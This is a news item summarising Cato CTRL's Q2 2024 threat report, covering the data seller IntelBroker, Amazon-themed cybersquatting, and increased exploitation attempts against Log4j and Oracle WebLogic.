The latest analysis from Cato CTRL reveals alarming developments in the cybersecurity landscape. The threat actor “IntelBroker” emerges as a central figure in selling stolen data and source code, and also plays a prominent role in hacking forums.
The Cato CTRL SASE Threat Report Q2 2024 focuses on three key areas:
- Hacker Communities
- Observations from the Dark Web
- Corporate and Network Security
The results are based on Cato CTRL’s analysis of 1.38 trillion network flows across more than 2,500 Cato customers worldwide between April and June 2024:
IntelBroker emerges as an active threat actor in terms of selling data and source code
In its investigation of hacker communities and the Dark Web, Cato CTRL encountered a threat actor calling themselves IntelBroker. They appear to be a prominent figure not only in selling data and source code but also as a moderator in so-called BreachForums within the hacking community.
In recent months, IntelBroker has offered data and source code from AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile, and U.S. Army Aviation and Missile Command for sale.
Amazon is the Most Impersonated Brand – Thanks to Cybersquatting
Cybersquatting involves using a domain name with the intention of profiting from the registered trademark of a legitimate company. Attackers use cybersquatting to obtain user credentials through various techniques such as spreading malware or phishing.
In the second quarter of 2024, Cato CTRL’s security researchers found that Amazon was by far the most frequently impersonated brand (66% of domains), while Google came in second with only 7%. Given how well-known and popular Amazon is, users should be particularly vigilant.
Log4j and Oracle WebLogic remain popular Zero-Days that continue to be exploited
Three years after its discovery in 2021, Log4j remains one of the most frequently used zero-days that continue to be exploited. From the first to the second quarter of 2024, Cato CTRL observed a 61% increase in attempted exploitation of Log4j in incoming traffic and a 79% increase in WAN-bound traffic.
The Oracle WebLogic vulnerability from 2020 also remains a popular zero-day vulnerability. From the first to the second quarter of 2024, Cato CTRL observed a 114% increase in attempted use of the Oracle WebLogic vulnerability in WAN-bound traffic.
For more results, please refer to the report.
(vp/Cato Networks)